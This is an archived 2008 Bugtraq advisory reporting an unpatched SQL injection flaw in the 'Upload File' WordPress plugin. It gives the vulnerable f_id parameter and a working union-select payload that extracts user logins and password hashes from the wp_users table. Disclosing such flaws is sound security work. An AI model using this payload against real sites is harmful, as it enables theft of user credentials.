| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 24 May 2008 06:53:21 -0000 From: my@...rg.ru To: bugtraq@...urityfocus.com Subject: vuln in WordPress plugin Upload File(UP) New Advisory: Wordpress Plugin Upload File(UP) Remote SQL Injection --------------------Summary---------------- Software: Upload File (WordPress Plugin) Critical Level: Moderate Type: SQL Injection Class: Remote Status: Unpatched PoC/Exploit: Not Available Solution: Not Available Discovered by: eserg.ru -----------------Description--------------- 1. SQL Injection. http://localhost/[path]/wp-uploadfile.php?f_id=[SQL] SQL query: null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/* --------------PoC/Exploit---------------------- Waiting for developer(s) reply. --------------Solution--------------------- No Patch available. --------------Credit----------------------- Regards, Belsec Team http://eserg.ru
Powered by blists - more mailing lists